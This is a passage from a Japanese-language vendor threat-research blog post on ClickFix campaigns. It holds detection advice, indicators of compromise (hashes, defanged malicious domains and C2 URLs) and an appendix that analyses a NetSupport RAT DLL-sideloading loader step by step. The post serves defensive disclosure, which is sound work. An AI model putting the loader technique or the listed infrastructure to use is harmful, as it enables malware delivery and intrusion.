* **クリップボードの監視:** ClickFixは、標的がクリップボードから悪意のあるコンテンツをペーストすることに依存しているため、ユーザーがWin+Xをタイプした直後のPowerShellの実行とペーストのアクティビティを関連付けることができます。

## 結論

ClickFixという手法は、ダイナミックにその手法を変えながら、脅威を増しています。脅威アクターはClickFixを組織に対する攻撃に活用し、脅威の拡散と持続のために人為的ミスを悪用します。

この記事では、NetSupport RAT、Latrodectus、Lumma Stealerの3つの著名なClickFixキャンペーンを調査しました。

ClickFixのルアー(誘い文句)を発見し検出するための実践的な方法として、EDRテレメトリーやWindowsイベント ログから疑わしいイベント、アクティビティ、パターンを調査することが可能です。

この進化する脅威に積極的に対処することは、組織の継続的なセキュリティにとって不可欠とされています。そのためには、ClickFixのルアーに注意するよう従業員を教育し、意識を高める取り組みが求められます。これは弊社が提案する脅威ハンティングに基づいた防御策や監視策を設定するのと平行して行われる必要があります。

パロアルトネットワークスのお客様は、以下の製品を通じて、上記の脅威に対する確実な保護を構築いただけます。

* [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire)
* [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering)と[Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security)は、悪意のあるJavaScriptによってクリップボードのバッファに注入された悪意のあるコマンドを検出することで、このブログで取り上げたようなClickFix攻撃をオフライン セキュリティのWebクローラで検出することができます
* [Cortex XDR](https://docs-cortex.paloaltonetworks.com/p/XDR)と[XSIAM](https://docs-cortex.paloaltonetworks.com/p/XSIAM)は、振る舞い脅威防御モジュールを通じて、本記事で取り上げたすべてのキャンペーンとマルウェアを防止することが可能です

情報漏えいの可能性がある場合、または緊急の案件がある場合は、[Unit 42インシデント レスポンス チーム](https://start.paloaltonetworks.com/contact-unit42.html)までご連絡ください。

* 北米:フリーダイヤル: +1 (866) 486-4842 (866.4.UNIT42)
* 英国: +44.20.3743.3660
* ヨーロッパおよび中東: +31.20.299.3130
* アジア: +65.6983.8730
* 日本: +81.50.1790.0200
* オーストラリア: +61.2.4062.7950
* インド: 00080005045107

パロアルトネットワークスは、本調査結果をサイバー脅威アライアンス(CTA)のメンバーと共有しています。CTAの会員は、この情報を利用して、その顧客に対して迅速に保護を提供し、悪意のあるサイバー アクターを組織的に妨害しています。[サイバー脅威アライアンス](https://www.cyberthreatalliance.org)について詳細を見る。

## 侵害のインジケーター

### Lumma Stealerの例からのSHA256ハッシュ

* Filename PartyContinued.exe:2bc23b53bb76e59d84b0175e8cba68695a21ed74be9327f0b6ba37edc2daaeef
* Filename Boat.pst (a CAB file):06efe89da25a627493ef383f1be58c95c3c89a20ebb4af4696d82e729c75d1a7

### Lumma Stealerのドメイン取得例

* iplogger\[.\]co
* stuffgull\[.\]top
* sumeriavgv\[.\]digital
* pub-164d8d82c41c4e1b871bc21802a18154.r2\[.\]dev
* pub-626890a630d8418ea6c2ef0fa17f02ef.r2\[.\]dev
* pub-164d8d82c41c4e1b871bc21802a18154.r2\[.\]dev
* pub-a5a2932dc7f143499b865f8580102688.r2\[.\]dev
* pub-7efc089d5da740a994d1472af48fc689.r2\[.\]dev
* agroeconb\[.\]live
* animatcxju\[.\]live

### LatrodectusのSHA256ハッシュ例

* Filename libcef.dll:5809c889e7507d357e64ea15c7d7b22005dbf246aefdd3329d4a5c58d482e7e1
* PowerShellダウンローダー: 52e6e819720fede0d12dcc5430ff15f70b5656cbd3d5d251abfc2dcd22783293
* JavaScriptダウンローダー: 57e75c98b22d1453da5b2642c8daf6c363c60552e77a52ad154c200187d20b9a
* JavaScriptダウンローダー: 33a0cf0a0105d8b65cf62f31ec0a6dcd48e781d1fece35b963c6267ab2875559

### LatrodectusのC2 URL例

* hxxps\[:\]//webbs\[.\]live/on/
* hxxps\[:\]//diab\[.\]live/up/
* hxxps\[:\]//mhbr\[.\]live/do/
* hxxps\[:\]//decr\[.\]live/j/
* hxxps\[:\]//lexip\[.\]live/n/
* hxxps\[:\]//rimz\[.\]live/u/
* hxxps\[:\]//byjs\[.\]live/v/
* hxxps\[:\]//btco\[.\]live/r/
* hxxps\[:\]//izan\[.\]live/r/
* hxxps\[:\]//k.veuwb\[.\]live/234
* hxxps\[:\]//r.netluc\[.\]live
* heyues\[.\]live
* hxxps\[:\]//k.mailam\[.\]live/234234

### NetSupport RATからのSHA256ハッシュ例

* Filename data\_3.bin (XOR encrypted stager):5C762FF1F604E92ECD9FD1DC5D1CB24B3AF4B4E0D25DE462C78F7AC0F897FC2D
* Filename data\_4.bin (XOR encrypted shellcode):9DCA5241822A0E954484D6C303475F94978B6EF0A016CBAE1FBA29D0AED86288
* Filename msvcp140.dll (loader):CBAF513E7FD4322B14ADCC34B34D793D79076AD310925981548E8D3CFF886527
* NetSupport ローダー ミュテックス:  
  nx0kFgSPY8SDVhOMjmNgW
* libsqlite3-0.dll:506ab08d0a71610793ae2a5c4c26b1eb35fd9e3c8749cd63877b03c205feb48a
* ファイル ロケーション C:◆ProgramData◆SecurityCheck◆v1◆client32.exe: 3ACC40334EF86FD0422FB386CA4FB8836C4FA0E722A5FCFA0086B9182127C1D7

### NetSupport RATからのローダー用ドメイン例:

* oktacheck.it\[.\]com
* doccsign.it\[.\]com
* docusign.sa\[.\]com
* dosign.it\[.\]com
* loyalcompany\[.\]net
* leocompany\[.\]org
* 80\.77.23\[.\]48
* mhousecreative\[.\]com

### NetSupport RATのC2ドメイン例:

* mh-sns\[.\]com
* lasix20\[.\]com

## その他の資料

* [LampionがClickFixのルアーで復活](https://unit42.paloaltonetworks.com/lampion-malware-clickfix-lures/) - Unit 42、パロアルトネットワークス
* [ClickFixの新たな活動](https://x.com/Unit42_Intel/status/1924866530195427372) - Unit 42、パロアルトネットワークス
* [影からスポットライトへ: Lumma Stealerの進化とその隠された秘密](https://www.cybereason.com/blog/threat-analysis-lummastealer-2.0) - CyberReason
* [NetSupport RAT Clickfixの配信](https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution)- Esentire
* [Lumma Stealer ClickFixの配信](https://esentire.com/security-advisories/lumma-stealer-clickfix-distribution)- Esentire
* [DeepSeek ClickFixの詐欺が明らかに](https://www.cloudsek.com/blog/deepseek-clickfix-scam-exposed-protect-your-data-before-its-too-late?) - CloudSEK
* [ClearFake:「偽アップデート」脅威の新たなプレイヤー](https://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/) - Sekoia
* [Havoc:Microsoft Graph APIを搭載したSharePointがFUD C2に](https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2) - Fortinet

## 付録: 新しいNetSupport RATローダーのテクニカル分析

このセクションでは、DLL ベースの新しいNetSupport RAT ローダーについて掘り下げます。過去には、NetSupport RATは比較的短い感染チェーンを持つ[スクリプトローダー](https://securelist.com/horns-n-hooves-campaign-delivering-netsupport-rat/114740/)によってロードされましたが、このローダーは攻撃にステルス性と複雑性のレベルを追加するものです。

ここで分析するのは[msvcp140.dll](https://www.virustotal.com/gui/file/cbaf513e7fd4322b14adcc34b34d793d79076ad310925981548e8d3cff886527)です。このDLLファイルは、[jp2launcher.exe](https://www.virustotal.com/gui/file/1fc684c5adf02b5a96cc407932429f1c2d3d2e78e3104cfbcf535a9de1ee4921)という正規の実行ファイルによってサイドロードされます。

このDLLは、分析を妨げるために、次のようないくつかのテクニックを使っています。

* ダイナミックAPIリゾルビング
* データの暗号化
* コードの難読化

例えば、jp2launcher.exeによってサイドロードされた後、DLLはスタックに次のステージのコードをバイトごとに書き込みます。この後、難読化を解除してコードを実行します。

最初の難読化解除後、DLLはcurl.exeを介してC2サーバーからdata\_3.binとdata\_4.binという暗号化されたバイナリを取得し、同じ作業ディレクトリのディスクにペイロードをドロップします。図13は、ペイロードの1つをダウンロードするcurl.exeコマンドの構成を示したものです。
![movやpushなど様々なコマンドをシンタックス ハイライトで表示したHTMLのスクリーンショット。](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/word-image-374366-149073-13.png) 図13.悪意のあるmsvcp140.dllローダーは、x64dbgデバッガーに表示される.binファイルをダウンロードするcurlコマンドを構築します。

ローダーはdata\_3.binとdata\_4.binの両方を暗号化されたバイナリとしてディスクに保存し、https://google\[.\]com/であるローリングXORキーを使用してメモリ内で復号化します。そしてローダーは、復号化したコードをjp2launcher.exeの子プロセスに注入します。

data\_4.binから復号化されたコードは、data\_3.binから復号化されたコードをロードする比較的小さなシェルコードです。このバイナリは完全に形成されたPEであり、最終的なNetSupport RATパッケージを攻撃者のC2サーバーからZIPアーカイブとしてダウンロードし、メモリ内で解凍します。図14は「hxxp\[:\]//80.77.23\[.\]48/service/settings/5702b2a25802ff1b520c0d1e388026f8074e836d4e69c10f9481283f886fd9f4」へのローダーのリクエストを示すものです。リクエストは一意のユーザー エージェントを含んでいます。
![タイムスタンプ付きのHTTPサーバー リクエストとサーバーの応答を詳細に記録したコンピューター ログのスクリーンショット。](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/word-image-377184-149073-14.png) 図14.C2からのjp2launcher.exeのダウンロード要求、client32.exeのダウンロード。

最終的なペイロードは、NetSupport RATとその必要な依存関係をすべて含むZIPアーカイブです。ローダーはNetSupport RATをC:\\ProgramData\\SecurityCheck\_v1\\ にドロップし、そのメインバイナリであるclient32.exeを実行します。

そしてローダーは、ユーザーがログインするたびにclient32.exeを実行するスケジュールタスクを作成することで、RATの永続性を確保します。

ローダーを静的に分析する過程で、弊社はこのDLLがMsiShellツールのあるシリーズの一部であることを示す、ユニークなPDBパスに気づきました。この道筋をたどっていくと、もうひとつのキャンペーンを見つけました。このケースでは、合法的なファイル転送ソフトウェアであるfilezilla.exeを使用し、ローダーの別のバージョンであるlibsqlite3-0.dllをサイドロードするものでした。図15は、2つのローダー バージョンのPDBパスの類似性を示したものです。
![ソフトウェアプロジェクトのファイルパスとGUIDを示す2つのスクリーンショット(いずれもデバッグ アーティファクト)。各項目は赤くハイライトされている。](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/08/word-image-379432-149073-15.png) 図15.NetSupport RATローダー両バージョンのPDBパス。
トップに戻る

### タグ

* [AutoIT](https://unit42.paloaltonetworks.com/ja/tag/autoit-ja/ "AutoIT")
* [Lumma Stealer](https://unit42.paloaltonetworks.com/ja/tag/lumma-stealer-ja/ "Lumma Stealer")
* [Malvertising](https://unit42.paloaltonetworks.com/ja/tag/malvertising-ja/ "malvertising")
* [Remote Access Trojan](https://unit42.paloaltonetworks.com/ja/tag/remote-access-trojan-ja/ "Remote Access Trojan")
* [Social engineering](https://unit42.paloaltonetworks.com/ja/tag/social-engineering-ja/ "social engineering")
* [Typosquatting](https://unit42.paloaltonetworks.com/ja/tag/typosquatting-ja/ "typosquatting")  
  [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research") [次ページ:GoldMelody の隠されたコード: イニシャル アクセス ブローカーのインメモリ IIS モジュールが明らかに](https://unit42.paloaltonetworks.com/ja/initial-access-broker-exploits-leaked-machine-keys/ "GoldMelody の隠されたコード: イニシャル アクセス ブローカーのインメモリ IIS モジュールが明らかに")

### 目次

* 

### 関連記事

* [イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/ "article - table of contents")
* [脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/ "article - table of contents")
* [BeyondTrustの深刻な脆弱性（CVE-2026-1731）の悪用においてVShellおよびSparkRATを確認](https://unit42.paloaltonetworks.com/ja/beyondtrust-cve-2026-1731/ "article - table of contents")

## 関連項目 マルウェア リソース

![Pictorial representation of ChainDrop, a self-propagating npm worm. An artistic depiction of a digital workspace featuring an open laptop with a red virus on the screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/03_Malware_Category_1920x900-7-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年8月6日 [#### ChainDropの脅威の概要:自己増殖型npmワームの内部](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/)

* [Blockchain](https://unit42.paloaltonetworks.com/ja/tag/blockchain-ja/ "blockchain")

* [ChainDrop](https://unit42.paloaltonetworks.com/ja/tag/chaindrop/ "ChainDrop")

* [Claude code](https://unit42.paloaltonetworks.com/ja/tag/claude-code/ "Claude code")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/ "ChainDropの脅威の概要:自己増殖型npmワームの内部")  
  ![Pictorial representation of the npm packages supply chain attack. Screen displaying code with a prominent alert symbol and the words 'VIRUS DETECTED' highlighted in red.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/05_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年6月2日 [#### npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/)

* [Credential Harvesting](https://unit42.paloaltonetworks.com/ja/tag/credential-harvesting-ja/ "Credential Harvesting")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Npm packages](https://unit42.paloaltonetworks.com/ja/tag/npm-packages/ "npm packages")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/ "npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)")  
  ![Pictorial representation of Screening Serpens. An illustrated blue snake is highlighted by a red circle against a night sky. The constellation serpens.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/05/Serpens-Iran-A-1920x900-2-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/threat-actor-groups.svg)脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/) 2026年5月22日 [#### イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/)

* [Advanced Persistent Threat](https://unit42.paloaltonetworks.com/ja/tag/advanced-persistent-threat-ja/ "Advanced Persistent Threat")

* [AppDomainManager](https://unit42.paloaltonetworks.com/ja/tag/appdomainmanager/ "AppDomainManager")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/ "イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡")  
  ![Pictorial representation of Iran cyber attacks. Close-up of a person wearing glasses, with computer code reflected in the lenses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/12_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月17日 [#### 脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/)

* [APK](https://unit42.paloaltonetworks.com/ja/tag/apk-ja/ "APK")

* [DDoS attacks](https://unit42.paloaltonetworks.com/ja/tag/ddos-attacks-ja/ "DDoS attacks")

* [GenAI](https://unit42.paloaltonetworks.com/ja/tag/genai-ja/ "GenAI")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/ "脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)")  
  ![Pictorial representation of the supply chain attack compromising Axios. A giant eye made of glowing binary code.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/02_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月1日 [#### 脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/)

* [API attacks](https://unit42.paloaltonetworks.com/ja/tag/api-attacks-ja/ "API attacks")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")

* [Powershell](https://unit42.paloaltonetworks.com/ja/tag/powershell-ja/ "Powershell")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/ "脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響")  
  ![Pictorial representation of TeamPCP. Glowing code on a screen where several word such as Crime, Hackers, and Security are highlighted in a contrasting color.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/03_Cybercrime_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年3月31日 [#### プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/)

* [CVE-2025-55182](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-55182-ja/ "CVE-2025-55182")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/ "プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃")  
  ![Pictorial representation of phishing campaign. A blurred image focusing on a person typing on a laptop with lines of code visible on the screen, illuminated in blue and red lights, suggestive of intense coding or cyber activities.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/06_Malware_Category_1920x900-3-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年3月24日 [#### 脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/)

* [Email scam](https://unit42.paloaltonetworks.com/ja/tag/email-scam/ "email scam")

* [Lure](https://unit42.paloaltonetworks.com/ja/tag/lure/ "lure")

* [Phishing](https://unit42.paloaltonetworks.com/ja/tag/phishing-ja/ "phishing")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/ "脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム")  
  ![Pictorial representation of Notepad++ supply chain compromise. A digital rendering of Earth from space, focusing on North and South America. The continents are illuminated in blue, with red lines and dots indicating data connections across various locations. Dark background highlights the vibrant network representation.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/11_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年2月11日 [#### 国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/)

* [Backdoor](https://unit42.paloaltonetworks.com/ja/tag/backdoor-ja/ "backdoor")

* [Cobalt Strike](https://unit42.paloaltonetworks.com/ja/tag/cobalt-strike-ja/ "Cobalt Strike")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/ "国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用")  
  ![Pictorial representation of runtime assembly attacks. Digital artwork of a glowing, futuristic shield disintegrating into small particles, set against a dark blue, bokeh-effect background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/09_Business_email_compromise_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月22日 [#### ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/)

* [API](https://unit42.paloaltonetworks.com/ja/tag/api-ja/ "API")

* [Google](https://unit42.paloaltonetworks.com/ja/tag/google-ja/ "Google")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/ "ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成")  
  ![Pictorial representation of SLOW#TEMPEST campaign. Digital artwork depicting a malware alert symbol on a computer screen, with background of blurred programming code in blue and red colors.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/07/07_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月2日 [#### Pyarmorを利用して難読化と検知回避を行うVVS Discord Stealer](https://unit42.paloaltonetworks.com/ja/vvs-stealer/)

* [Discord](https://unit42.paloaltonetworks.com/ja/tag/discord/ "Discord")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")

* [Python](https://unit42.paloaltonetworks.com/ja/tag/python-ja/ "Python")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/vvs-stealer/ "Pyarmorを利用して難読化と検知回避を行うVVS Discord Stealer")

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)

* ![Slider arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/slider-arrow-left.svg)  
  ![Close button](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/close-modal.svg) ![Enlarged Image]()  
  ![Newsletter](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/04/Unit-42_get-updates-banner.png)  
  ![UNIT 42 Small Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/palo-alto-logo-small.svg) Unit 42 からの最新情報を取得

## 進化する脅威の状況を常に先取り

メール アドレス

本フォームを送信することにより、[利用規約](https://www.paloaltonetworks.jp/legal-notices/terms-of-use)に同意し、[プライバシー ポリシー](https://www.paloaltonetworks.jp/legal-notices/privacy)を承認したことになります。

本サイトは reCAPTCHA で保護されており、Googleの[プライバシー ポリシー](https://policies.google.com/privacy) と[サービス利用規約](https://policies.google.com/terms)が適用されます。

Invalid captcha!
サブスクライブ ![Right Arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/right-arrow.svg) ![loader](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-loader.svg)  
{#footer} 製品とサービス

* [AI利用ネットワーク セキュリティ プラットフォーム](https://www.paloaltonetworks.jp/network-security)

* [AIのセキュア バイ デザイン](https://www.paloaltonetworks.jp/precision-ai-security/secure-ai-by-design)

* [Prisma AIRS](https://www.paloaltonetworks.jp/prisma/prisma-ai-runtime-security)

* [AI Access Security](https://www.paloaltonetworks.jp/sase/ai-access-security)

* [クラウド提供型セキュリティ サービス](https://www.paloaltonetworks.jp/network-security/security-subscriptions)

* [Advanced Threat Prevention](https://www.paloaltonetworks.jp/network-security/advanced-threat-prevention)

* [Advanced URL Filtering](https://www.paloaltonetworks.jp/network-security/advanced-url-filtering)

* [Advanced WildFire](https://www.paloaltonetworks.jp/network-security/advanced-wildfire)

* [Advanced DNS Security](https://www.paloaltonetworks.jp/network-security/advanced-dns-security)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Enterprise IoT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/enterprise-iot-security)

* [Medical IoT Security](https://www.paloaltonetworks.jp/network-security/medical-device-security)

* [Industrial OT Security](https://www.paloaltonetworks.jp/content/pan/ja_JP/network-security/industrial-ot-security)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [次世代ファイアウォール](https://www.paloaltonetworks.jp/network-security/next-generation-firewall)

* [ハードウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/hardware-firewall-innovations)

* [ソフトウェア ファイアウォール](https://www.paloaltonetworks.jp/network-security/software-firewalls)

* [Strata Cloud Manager](https://www.paloaltonetworks.jp/network-security/strata-cloud-manager)

* [SD-WAN for NGFW](https://www.paloaltonetworks.jp/network-security/sd-wan-subscription)

* [PAN-OS](https://www.paloaltonetworks.jp/network-security/pan-os)

* [Panorama](https://www.paloaltonetworks.jp/network-security/panorama)

* [セキュア アクセス サービス エッジ](https://www.paloaltonetworks.jp/sase)

* [Prisma SASE](https://www.paloaltonetworks.jp/sase)

* [App Acceleration](https://www.paloaltonetworks.jp/sase/app-acceleration)

* [自律型デジタルエクスペリエンス管理](https://www.paloaltonetworks.jp/sase/adem)

* [Enterprise DLP](https://www.paloaltonetworks.jp/sase/enterprise-data-loss-prevention)

* [Prisma Access](https://www.paloaltonetworks.jp/sase/access)

* [Prisma Browser](https://www.paloaltonetworks.jp/sase/prisma-browser)

* [Prisma SD-WAN](https://www.paloaltonetworks.jp/sase/sd-wan)

* [リモート ブラウザ分離](https://www.paloaltonetworks.jp/sase/remote-browser-isolation)

* [SaaS Security](https://www.paloaltonetworks.jp/sase/saas-security)

* [AI駆動型セキュリティ運用プラットフォーム](https://www.paloaltonetworks.jp/cortex)

* [Cloud Security](https://www.paloaltonetworks.jp/cortex/cloud)

* [Cortex Cloud](https://www.paloaltonetworks.jp/cortex/cloud)

* [Application Security](https://www.paloaltonetworks.jp/cortex/cloud/application-security)

* [Cloud Posture Security](https://www.paloaltonetworks.jp/cortex/cloud/cloud-posture-security)

* [Cloud Runtime Security](https://www.paloaltonetworks.jp/cortex/cloud/runtime-security)

* [Prisma Cloud](https://www.paloaltonetworks.jp/prisma/cloud)

* [AI駆動型SOC](https://www.paloaltonetworks.jp/cortex)

* [Cortex XSIAM](https://www.paloaltonetworks.jp/cortex/cortex-xsiam)

* [Cortex XDR](https://www.paloaltonetworks.jp/cortex/cortex-xdr)

* [Cortex XSOAR](https://www.paloaltonetworks.jp/cortex/cortex-xsoar)

* [Cortex Xpanse](https://www.paloaltonetworks.jp/cortex/cortex-xpanse)

* [Unit 42マネージド ディテクション\&レスポンス](https://www.paloaltonetworks.jp/cortex/managed-detection-and-response)

* [マネージドXSIAM](https://www.paloaltonetworks.jp/cortex/managed-xsiam)

* [次世代のアイデンティティ セキュリティ](https://www.paloaltonetworks.jp/idira)

* [特権アクセス管理](https://www.paloaltonetworks.jp/idira/human/privileged-access-management)

* [アイデンティティ管理とアクセス管理](https://www.paloaltonetworks.jp/idira/human/identity-and-access-management)

* [Endpoint Privilege Manager](https://www.paloaltonetworks.jp/idira/human/endpoint-privilege-manager)

* [アイデンティティ ガバナンス](https://www.paloaltonetworks.jp/idira/human/identity-governance)

* [従業員パスワード管理](https://www.paloaltonetworks.jp/idira/human/workforce-password-management)

* [エージェンティック アイデンティティ](https://www.paloaltonetworks.jp/idira/agentic)

* [シークレット管理](https://www.paloaltonetworks.jp/idira/machine/secrets-management)

* [統合型シークレット ガバナンス](https://www.paloaltonetworks.jp/idira/machine/unified-secrets-governance)

* [アプリケーションの認証情報配信](https://www.paloaltonetworks.jp/idira/machine/application-credentials-delivery)

* [ベンダーの特権アクセス](https://www.paloaltonetworks.jp/idira/human/vendor-privileged-access)

* [脅威インテリジェンス\&インシデント レスポンス サービス](https://www.paloaltonetworks.jp/unit42)

* [予防評価](https://www.paloaltonetworks.jp/unit42/assess)

* [インシデント レスポンス](https://www.paloaltonetworks.jp/unit42/respond)

* [セキュリティ戦略を変革](https://www.paloaltonetworks.jp/unit42/transform)

